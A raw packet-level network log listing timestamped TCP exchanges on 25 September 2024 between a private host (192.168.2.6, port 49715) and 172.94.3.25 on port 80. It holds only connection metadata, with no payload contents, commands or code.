Sep 25, 2024 16:03:23.578800917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.605752945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605853081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605873108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605885983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605899096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605922937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605926991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.605926991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.605945110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605957985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605969906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605983973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.605988979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.605988979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.605995893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606008053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606034994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606055021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606056929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606056929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606065989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606091976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606102943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606115103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606127977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606133938 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606133938 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606141090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606152058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606165886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606178045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606178999 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606178999 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606215000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606234074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606245995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606245995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606307983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606319904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606331110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606343985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606359005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606364012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606364012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606369019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606380939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606393099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606410027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606410027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606419086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606431007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606441975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606455088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606476068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606476068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606491089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606503010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606514931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606525898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606539011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606545925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606545925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606586933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606609106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606621027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606632948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606637955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606637955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606647015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606661081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606672049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606683969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606683969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606684923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606761932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606774092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606785059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606802940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606802940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606806040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606817961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606827974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606841087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606853008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606859922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606859922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606874943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606884956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606895924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606905937 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606913090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606944084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606944084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.606987953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.606997967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607008934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607023001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607040882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607042074 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607053995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607065916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607084036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607084036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607088089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607099056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607111931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607124090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607135057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607142925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607142925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607170105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607191086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607203007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607213974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607220888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607220888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607225895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607286930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607297897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607309103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607316971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607316971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607320070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607331038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607358932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607358932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607397079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607408047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607420921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607434034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607445955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607460976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607470036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607470036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607472897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607485056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607496977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607506990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607511044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607538939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607542038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607553005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607566118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607584953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607584953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607623100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607645988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607656956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607669115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607676983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607681036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607692003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607702971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607703924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607722044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607733965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607742071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607742071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607763052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607765913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607777119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607808113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607809067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607820988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607831955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607847929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607860088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.607877016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.607877016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.608120918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.608133078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.608144999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.608155012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.608155966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.608167887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.608179092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.608191013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.608206034 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.608206034 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.608334064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694528103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694555998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694567919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694581985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694602013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694612980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694624901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694636106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694662094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694673061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694684029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694694996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694705963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694714069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694714069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694716930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694730043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694741011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694752932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694755077 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694755077 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694766045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694776058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694785118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694804907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694823980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694833994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694844007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694844007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694855928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694864988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694875956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694895983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694900036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694900036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694907904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694921017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694931984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694936991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694936991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.694942951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694952965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694972038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694987059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.694998980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695007086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695009947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695022106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695023060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695023060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695087910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695097923 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695099115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695111036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695121050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695130110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695132971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695144892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695157051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695167065 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695167065 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695168018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695192099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695204020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695220947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695233107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695244074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695255041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695261955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695261955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695266008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695290089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695310116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695322037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695323944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695323944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695333004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695365906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695378065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695396900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695399046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695399046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695409060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695421934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695434093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695452929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695452929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695466042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695477009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695501089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695529938 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695529938 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695540905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695552111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695599079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695741892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695763111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695775032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695785999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695806980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695812941 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695817947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695828915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695841074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695847988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695847988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695852995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695864916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695877075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695879936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695892096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695904016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695923090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695924044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695924044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695935011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695945024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695966959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695979118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695990086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.695996046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.695996046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696001053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696012974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696023941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696037054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696038961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696038961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696048975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696084023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696084023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696109056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696124077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696192980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696194887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696202993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696213961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696228981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696239948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696249962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696257114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696257114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696321011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696331978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696342945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696356058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696367025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696373940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696373940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.696377993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696392059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.696404934 CEST	80	49715	172.94.3.25	192.168.2.6
